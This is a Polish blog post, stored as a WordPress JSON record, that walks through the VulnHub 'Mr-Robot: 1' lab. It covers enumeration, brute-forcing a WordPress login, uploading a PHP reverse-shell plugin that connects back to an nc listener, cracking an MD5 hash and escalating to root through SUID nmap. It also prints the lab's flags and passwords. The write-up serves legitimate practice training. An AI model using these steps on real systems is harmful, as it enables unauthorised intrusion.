{"id":35,"date":"2019-08-07T20:10:47","date_gmt":"2019-08-07T20:10:47","guid":{"rendered":"http:\/\/www.linuxsystems.ovh\/?p=35"},"modified":"2020-05-25T16:29:43","modified_gmt":"2020-05-25T16:29:43","slug":"vulnhub-mr-robot-1","status":"publish","type":"post","link":"https:\/\/www.linuxsystems.ovh\/?p=35","title":{"rendered":"Vulnhub: Mr-Robot: 1"},"content":{"rendered":"\n

Dzisiaj zaprezentuj\u0119 wam jak uzyska\u0107 wszystkie 3 klucze z obrazu Mr-Robot: 1 dost\u0119pnego tutaj: https:\/\/www.vulnhub.com\/entry\/mr-robot-1,151\/<\/a> , a wi\u0119c do dzie\u0142a \ud83d\ude42<\/p>\n\n\n\n\n\n\n\n

co\n to sprawdzamy jaki ma IP nasza virtualka, wiem tylko tyle, \u017ce w mojej \nsieci dostanie IP z klasy 192.168.1.0\/24, a wi\u0119c uruchamiamy:<\/p>\n\n\n\n

netdiscover -r 192.168.1.0\/24<\/p><\/blockquote>\n\n\n\n

Uzyskamy taki wynik:<\/p>\n\n\n\n

$ netdiscover -r 192.168.1.0\/24
Currently scanning: Finished! | Screen View: Unique Hosts
22 Captured ARP Req\/Rep packets, from 11 hosts. Total size: 1324
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor \/ Hostname
\u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 –
[\u2026]
192.168.1.165 08:00:27:10:7f:e3 2 120 PCS Systemtechnik GmbH
[\u2026]<\/p><\/blockquote>\n\n\n\n

Adres IP by\u0107 inny, gdy\u017c jest on pobierany z DHCP \ud83d\ude42<\/p>\n\n\n\n

nast\u0119pnie skanuj\u0119 go nmap`em:<\/p>\n\n\n\n

$ nmap 192.168.1.165
Starting Nmap 7.70 ( https:\/\/nmap.org<\/a> ) at 2019\u201307\u201306 19:00 CEST
Nmap scan report for linux.localdomain (192.168.1.165)
Host is up (0.00018s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22\/tcp closed ssh
80\/tcp open http
443\/tcp open https
MAC Address: 08:00:27:10:7F:E3 (Oracle VirtualBox virtual NIC)<\/p>

Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds<\/p><\/blockquote>\n\n\n\n

Jak widzimy jest otwarty port SSH\/HTTP\/HTTPS zobaczmy wi\u0119c co jest na tej stronie:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Nic ciekawego wi\u0119c pu\u015b\u0107my dirb z opcj\u0105 big.txt:<\/p>\n\n\n\n

$ dirb http:\/\/192.168.1.165\/<\/a> -w \/usr\/share\/wordlists\/dirb\/big.txt<\/p><\/blockquote>\n\n\n\n

a za ten czas zobaczmy czy nie ma czasami pliku robots.txt:<\/p>\n\n\n\n

$ curl http:\/\/192.168.1.165\/robots.txt<\/a>
User-agent: *
fsocity.dic
key-1-of-3.txt<\/p><\/blockquote>\n\n\n\n

Widzimy plik key-1-of-3.txt sprawd\u017amy go:<\/p>\n\n\n\n

curl http:\/\/192.168.1.165\/key-1-of-3.txt<\/a>
073403c8a58a1f80d943455fb30724b9<\/p><\/blockquote>\n\n\n\n

Tym oto sposobem uzyskali\u015bmy 1 klucz z tej wirtualki \ud83d\ude42 gratuluj\u0119 \ud83d\ude42<\/p>\n\n\n\n

Wracamy do wynik\u00f3w dirb`a:<\/p>\n\n\n\n

$ dirb http:\/\/192.168.1.165\/<\/a> -w \/usr\/share\/wordlists\/dirb\/big.txt
\u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 –
DIRB v2.22
By The Dark Raver
\u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 –<\/p>

START_TIME: Sat Jul 6 18:54:35 2019
URL_BASE: http:\/\/192.168.1.165\/<\/a>
WORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt
OPTION: Not Stopping on warning messages<\/p>

\u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 –
GENERATED WORDS: 4612
\u2014 \u2014 Scanning URL: http:\/\/192.168.1.165\/<\/a> \u2014 \u2014
==> DIRECTORY: http:\/\/192.168.1.165\/0\/<\/a>
==> DIRECTORY: http:\/\/192.168.1.165\/admin\/<\/a>
+ http:\/\/192.168.1.165\/atom<\/a> (CODE:301|SIZE:0)
==> DIRECTORY: http:\/\/192.168.1.165\/audio\/<\/a>
^C<\/p><\/blockquote>\n\n\n\n

i zauwa\u017camy \u015bcie\u017ck\u0119 \/0\/, wi\u0119c pr\u00f3bujemy zobaczy\u0107 co tam jest:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Ukazuje nam si\u0119 popularny CMS wordpress \ud83d\ude42<\/p>\n\n\n\n

Uruchamiamy wi\u0119c wp-scan:<\/p>\n\n\n\n

wpscan \u2014 url http:\/\/192.168.1.165\/0<\/a> -e u
_______________________________________________________________
__ _______ _____
\\ \\ \/ \/ __ \\ \/ ____|
\\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae
\\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | \u2018_ \\
\\ \/\\ \/ | | ____) | (__| (_| | | | |
\\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|<\/p>

WordPress Security Scanner by the WPScan Team
Version 3.5.4
Sponsored by Sucuri \u2014 https:\/\/sucuri.net<\/a>
@_WPScan_<\/a>, @ethicalhack3r<\/a>, @erwan_lr<\/a>, @_FireFart_<\/a>
_______________________________________________________________<\/p>

Scan\n Aborted: Unable to identify the wp-content dir, please supply it with \u2014\n wp-content-dir, use the \u2014 scope option or make sure the \u2014 url value \ngiven is the correct one<\/p><\/blockquote>\n\n\n\n

niestety jest b\u0142\u0105d, poniewa\u017c katalog wp-content nie jest w \/0\/wp-content , a w \/wp-content, a wi\u0119c dopisujemy:<\/p>\n\n\n\n

$ wpscan \u2014 url http:\/\/192.168.1.165\/0<\/a> -e u \u2014 wp-content-dir wp-content
_______________________________________________________________
__ _______ _____
\\ \\ \/ \/ __ \\ \/ ____|
\\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae
\\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | \u2018_ \\
\\ \/\\ \/ | | ____) | (__| (_| | | | |
\\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|<\/p>

WordPress Security Scanner by the WPScan Team
Version 3.5.4
Sponsored by Sucuri \u2014 https:\/\/sucuri.net<\/a>
@_WPScan_<\/a>, @ethicalhack3r<\/a>, @erwan_lr<\/a>, @_FireFart_<\/a>
_______________________________________________________________<\/p>

[+] URL: http:\/\/192.168.1.165\/0\/<\/a>
[+] Started: Sat Jul 6 19:11:45 2019<\/p>

Interesting Finding(s):<\/p>

[+] http:\/\/192.168.1.165\/0\/<\/a>
| Interesting Entries:
| \u2014 Server: Apache
| \u2014 X-Powered-By: PHP\/5.5.29
| \u2014 X-Mod-Pagespeed: 1.9.32.3\u20134523
| Found By: Headers (Passive Detection)
| Confidence: 100%<\/p>

[+] http:\/\/192.168.1.165\/xmlrpc.php<\/a>
| Found By: Headers (Passive Detection)
| Confidence: 100%
| Confirmed By:
| \u2014 Link Tag (Passive Detection), 30% confidence
| \u2014 Direct Access (Aggressive Detection), 100% confidence
| References:
| \u2014 http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API<\/a>
| \u2014 https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner<\/a>
| \u2014 https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos<\/a>
| \u2014 https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login<\/a>
| \u2014 https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access<\/a><\/p>

[+] WordPress version 4.3.19 identified (Latest, released on 2019\u201303\u201313).
| Detected By: Rss Generator (Passive Detection)
| \u2014 http:\/\/192.168.1.165\/feed\/<\/a>, <generator>https:\/\/wordpress.org\/?v=4.3.19<\/a><\/generator>
| \u2014 http:\/\/192.168.1.165\/comments\/feed\/<\/a>, <generator>https:\/\/wordpress.org\/?v=4.3.19<\/a><\/generator><\/p>

[i] The main theme could not be detected.<\/p>

[+] Enumerating Users (via Passive and Aggressive Methods)
\n Brute Forcing Author IDs \u2014 Time: 00:00:00 \n<================================================================================================================================>\n (10 \/ 10) 100.00% Time: 00:00:00<\/p>

[i] User(s) Identified:<\/p>

[+] mich05654
| Detected By: Author Id Brute Forcing \u2014 Author Pattern (Aggressive Detection)<\/p>

[+] elliot
| Detected By: Author Id Brute Forcing \u2014 Author Pattern (Aggressive Detection)<\/p>

[+] Finished: Sat Jul 6 19:11:48 2019
[+] Requests Done: 45
[+] Cached Requests: 9
[+] Data Sent: 7.251 KB
[+] Data Received: 142.523 KB
[+] Memory used: 79.816 MB
[+] Elapsed time: 00:00:02<\/p><\/blockquote>\n\n\n\n

Ukazuj\u0105\n nam si\u0119 2 u\u017cytkownik\u00f3w: elliot, oraz mich05654\u2026 przypominamy sobie, \u017ce w\n pliku robots.txt by\u0142 tak\u017ce plik: fsocity.dic wi\u0119c pr\u00f3bujemy go pobra\u0107:<\/p>\n\n\n\n

wget http:\/\/192.168.1.165\/fsocity.dic<\/a>
\u2014 2019\u201307\u201306 22:53:56 \u2014 http:\/\/192.168.1.165\/fsocity.dic<\/a>
\u0141\u0105czenie si\u0119 z 192.168.1.165:80\u2026 po\u0142\u0105czono.
\u017b\u0105danie HTTP wys\u0142ano, oczekiwanie na odpowied\u017a\u2026 200 OK
D\u0142ugo\u015b\u0107: 7245381 (6,9M) [text\/x-c]
Zapis do: `fsocity.dic\u2019<\/p>

fsocity.dic\n \n100%[=================================================================================================================>]\n 6,91M 37,1MB\/s w 0,2s<\/p>

2019\u201307\u201306 22:53:56 (37,1 MB\/s) \u2014 zapisano `fsocity.dic\u2019 [7245381\/7245381]<\/p><\/blockquote>\n\n\n\n

Sprawdzamy zawarto\u015b\u0107 tego pliku:<\/p>\n\n\n\n

# cat fsocity.dic | head -n 5
true
false
wikia
from
the<\/p><\/blockquote>\n\n\n\n

wygl\u0105da na jaki\u015b s\u0142ownik, a wi\u0119c pr\u00f3bujemy robi\u0107 brute-force tym s\u0142ownikiem u\u017cytkownika elliot:<\/p>\n\n\n\n

$ wpscan \u2014 url http:\/\/192.168.1.165\/0<\/a> \u2014 wp-content-dir wp-content -U elliot -P fsocity.dic
_______________________________________________________________
__ _______ _____
\\ \\ \/ \/ __ \\ \/ ____|
\\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae
\\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | \u2018_ \\
\\ \/\\ \/ | | ____) | (__| (_| | | | |
\\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|<\/p>

WordPress Security Scanner by the WPScan Team
Version 3.5.4
Sponsored by Sucuri \u2014 https:\/\/sucuri.net<\/a>
@_WPScan_<\/a>, @ethicalhack3r<\/a>, @erwan_lr<\/a>, @_FireFart_<\/a>
_______________________________________________________________<\/p>

[+] URL: http:\/\/192.168.1.165\/0\/<\/a>
[+] Started: Sat Jul 6 21:09:51 2019<\/p>

Interesting Finding(s):<\/p>

[+] http:\/\/192.168.1.165\/0\/<\/a>
| Interesting Entries:
| \u2014 Server: Apache
| \u2014 X-Powered-By: PHP\/5.5.29
| \u2014 X-Mod-Pagespeed: 1.9.32.3\u20134523
| Found By: Headers (Passive Detection)
| Confidence: 100%<\/p>

[+] http:\/\/192.168.1.165\/xmlrpc.php<\/a>
| Found By: Headers (Passive Detection)
| Confidence: 100%
| Confirmed By:
| \u2014 Link Tag (Passive Detection), 30% confidence
| \u2014 Direct Access (Aggressive Detection), 100% confidence
| References:
| \u2014 http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API<\/a>
| \u2014 https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner<\/a>
| \u2014 https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos<\/a>
| \u2014 https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login<\/a>
| \u2014 https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access<\/a><\/p>

[+] WordPress version 4.3.19 identified (Latest, released on 2019\u201303\u201313).
| Detected By: Rss Generator (Passive Detection)
| \u2014 http:\/\/192.168.1.165\/feed\/<\/a>, <generator>https:\/\/wordpress.org\/?v=4.3.19<\/a><\/generator>
| \u2014 http:\/\/192.168.1.165\/comments\/feed\/<\/a>, <generator>https:\/\/wordpress.org\/?v=4.3.19<\/a><\/generator><\/p>

[i] The main theme could not be detected.<\/p>

[+] Enumerating All Plugins (via Passive Methods)<\/p>

[i] No plugins Found.<\/p>

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
\n Checking Config Backups \u2014 Time: 00:00:00 \n<=================================================================================================================================>\n (21 \/ 21) 100.00% Time: 00:00:00<\/p>

[i] No Config Backups Found.<\/p>

[+] Performing password attack on Xmlrpc Multicall against 1 user\/s
Progress\n Time: 00:34:36 \n<===============================================================================================================================================>\n (1716 \/ 1716) 100.00% Time: 00:34:36
WARNING: Your progress bar is \ncurrently at 1716 out of 1716 and cannot be incremented. In v2.0.0 this \nwill become a ProgressBar::InvalidProgressError.
Progress Time: \n00:34:36 \n<===============================================================================================================================================>\n (1716 \/ 1716) 100.00% Time: 00:34:36
[SUCCESS] \u2014 elliot \/ ER28\u20130652 <\/strong>
All Found<\/p>

[i] Valid Combinations Found:
| Username: elliot, Password: ER28\u20130652<\/p>

[+] Finished: Sat Jul 6 21:44:30 2019
[+] Requests Done: 1761
[+] Cached Requests: 7
[+] Data Sent: 414.387 KB
[+] Data Received: 175.93 MB
[+] Memory used: 360.078 MB
[+] Elapsed time: 00:34:38<\/p><\/blockquote>\n\n\n\n

I zosta\u0142o znalezione has\u0142o \ud83d\ude00 login to: elliot<\/strong> has\u0142o to: ER28\u20130652, <\/strong>wi\u0119c przechodzimy do http:\/\/192.168.1.165\/wp-admin<\/a> i logujemy si\u0119 powy\u017cej podanymi danymi i\u2026 widzimy panel wordpressa\u2026<\/p>\n\n\n\n

Pr\u00f3bujemy doda\u0107 w\u0142asny plugin z reverse shell, a wi\u0119c przechodzimy do zak\u0142adki Plugins -> Add New<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

i naciskamy przycisk Upload Plugin.<\/p>\n\n\n\n

Teraz przygotowywujemy sobie plugin do wordpressa.<\/p>\n\n\n\n

Pobieramy z tego gita: https:\/\/github.com\/pentestmonkey\/php-reverse-shell<\/a> plik o nazwie: php-reverse-shell.php<\/a> i go delikatnie przerabiamy. Mianowicie na samym pocz\u0105tku tego pliku zaraz po <?php dodajemy:<\/p>\n\n\n\n

\/*
Plugin Name: BlackRoomSec\u2019s Evil Reverse Shell
Plugin URI: https:\/\/www.blackroomsec.com<\/a>
Description: Gets Tara into your cybers, duh!
Version: 1.0 baby
Author: BRS
Author URI: http:\/\/www.blackroomsec.com<\/a>
Text Domain: evil-shell
Domain Path: \/languages
*\/<\/p><\/blockquote>\n\n\n\n

Oraz kilka linijek p\u00f3\u017aniej zmieniamy:<\/p>\n\n\n\n

$ip = \u2018127.0.0.1\u2019; \/\/ CHANGE THIS<\/p><\/blockquote>\n\n\n\n

pakujemy ten plik w zip:<\/p>\n\n\n\n

$ zip plugin.zip php-reverse-shell.php
adding: php-reverse-shell.php (deflated 58%)<\/p><\/blockquote>\n\n\n\n

i nast\u0119pnie plik plugin.zip<\/strong>\n wysy\u0142amy na serwer, jak ka\u017cdy inny plugin wordpressa \ud83d\ude42 . Zanim jednak \nklikniemy Activate Plugin, uruchamiamy program, kt\u00f3ry nas\u0142uchuje na \nporcie 1234 na naszym komputerze\/laptopie:<\/p>\n\n\n\n

nc -lvp 1234<\/p><\/blockquote>\n\n\n\n

Klikamy activate plugin i naszym oczom ukazuje si\u0119:<\/p>\n\n\n\n

$ nc -lvp 1234
Ncat: Version 7.70 ( https:\/\/nmap.org\/ncat<\/a> )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.165.
Ncat: Connection from 192.168.1.165:42530.
Linux linux 3.13.0\u201355-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU\/Linux
20:27:45 up 3:37, 0 users, load average: 0.00, 0.01, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
\/bin\/sh: 0: can\u2019t access tty; job control turned off
$<\/p><\/blockquote>\n\n\n\n

wpisuj\u0105c polecenie id<\/strong> widzimy, \u017ce jeste\u015bmy zalogowani jako:<\/p>\n\n\n\n

uid=1(daemon) gid=1(daemon) groups=1(daemon)<\/p><\/blockquote>\n\n\n\n

Poprawiamy sobie \u201cwygl\u0105d terminala\u201d na \/bin\/bash poleceniem:<\/p>\n\n\n\n

python -c \u201cimport pty;pty.spawn(\u2018\/bin\/bash\u2019)\u201d<\/p><\/blockquote>\n\n\n\n

przechodzimy do katalogu \/home\/robot:<\/p>\n\n\n\n

cd \/home\/robot<\/p><\/blockquote>\n\n\n\n

i listujemy pliki:<\/p>\n\n\n\n

$ ls -l
ls -l
total 8
-r \u2014 \u2014 \u2014 \u2014 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r \u2014 r \u2014 1 robot robot 39 Nov 13 2015 password.raw-md5
daemon@linux:\/home\/robot$ cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
daemon@linux:\/home\/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b<\/p><\/blockquote>\n\n\n\n

Jak\n widzimy nie umiemy jeszcze odczyta\u0107 klucza key-2-of-3.txt, ale za to \numiemy odczyta\u0107 plik password.raw-md5, wi\u0119c wchodzimy na stron\u0119:MD5HashingUltimate Hashing and Anonymity toolkitmd5hashing.net<\/a><\/p>\n\n\n\n

i pr\u00f3bujemy zdecryptowa\u0107 algorytm md5.
udaje nam si\u0119 to i dostajemy wynik: abcdefghijklmnopqrstuvwxyz<\/strong><\/p>\n\n\n\n

Pr\u00f3bujemy si\u0119 zalogowa\u0107 jako user robot:<\/p>\n\n\n\n

$ su \u2014 robot
su \u2014 robot
Password: abcdefghijklmnopqrstuvwxyz<\/p><\/blockquote>\n\n\n\n

i udaje nam si\u0119 zalogowa\u0107 jeste\u015bmy jako user robot, wi\u0119c odczytujemy plik key-2-of-3.txt:<\/p>\n\n\n\n

$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959<\/p><\/blockquote>\n\n\n\n

Szukamy programu, dzi\u0119ki kt\u00f3rym mo\u017cliwa b\u0119dzie eskalacja uprawnie\u0144 do root:<\/p>\n\n\n\n

find \/ -user root -perm -4000 -print
find \/ -user root -perm -4000 -print
\/bin\/ping
\/bin\/umount
\/bin\/mount
\/bin\/ping6
\/bin\/su
find: `\/etc\/ssl\/private\u2019: Permission denied
\/usr\/bin\/passwd
\/usr\/bin\/newgrp
\/usr\/bin\/chsh
\/usr\/bin\/chfn
\/usr\/bin\/gpasswd
\/usr\/bin\/sudo
\/usr\/local\/bin\/nmap<\/p><\/blockquote>\n\n\n\n

Zauwa\u017camy, \u017ce jest program nmap, kt\u00f3ry pozwala nam na eskalacj\u0119 uprawnie\u0144 do roota: https:\/\/pentestlab.blog\/category\/privilege-escalation\/<\/a><\/p>\n\n\n\n

a wi\u0119c uruchamiamy go:<\/p>\n\n\n\n

$ nmap \u2014 interactive
nmap \u2014 interactive<\/p>

Starting nmap V. 3.81 ( http:\/\/www.insecure.org\/nmap\/<\/a> )
Welcome to Interactive Mode \u2014 press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
#<\/p><\/blockquote>\n\n\n\n

i ju\u017c jeste\u015bmy jako root \ud83d\ude42<\/p>\n\n\n\n

nast\u0119pnie przechodzimy do katalogu \/root i patrzymy jakie ma pliki:<\/p>\n\n\n\n

# cd \/root
cd \/root
# ls -l
ls -l
total 4
-rw-r \u2014 r \u2014 1 root root 0 Nov 13 2015 firstboot_done
-r \u2014 \u2014 \u2014 \u2014 1 root root 33 Nov 13 2015 key-3-of-3.txt
#<\/p><\/blockquote>\n\n\n\n

czytamy plik key-3-of-3.txt:<\/p>\n\n\n\n

# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4<\/p><\/blockquote>\n\n\n\n

i tym oto sposobem rozwi\u0105zali\u015bmy virtualk\u0119 z VulnHub (Mr-Robot: 1)<\/a><\/p>\n\n\n\n

Polecam ka\u017cdemu spr\u00f3bowa\u0107 samemu rozwi\u0105za\u0107 t\u0105 virtualk\u0119 \ud83d\ude42 .<\/p>\n","protected":false},"excerpt":{"rendered":"

Dzisiaj zaprezentuj\u0119 wam jak uzyska\u0107 wszystkie 3 klucze z obrazu Mr-Robot: 1 dost\u0119pnego tutaj: https:\/\/www.vulnhub.com\/entry\/mr-robot-1,151\/ , a wi\u0119c do dzie\u0142a \ud83d\ude42<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-35","post","type-post","status-publish","format-standard","hentry","category-bezpieczenstwo-internetowe"],"_links":{"self":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/35","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=35"}],"version-history":[{"count":3,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/35\/revisions"}],"predecessor-version":[{"id":527,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/35\/revisions\/527"}],"wp:attachment":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=35"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=35"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=35"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}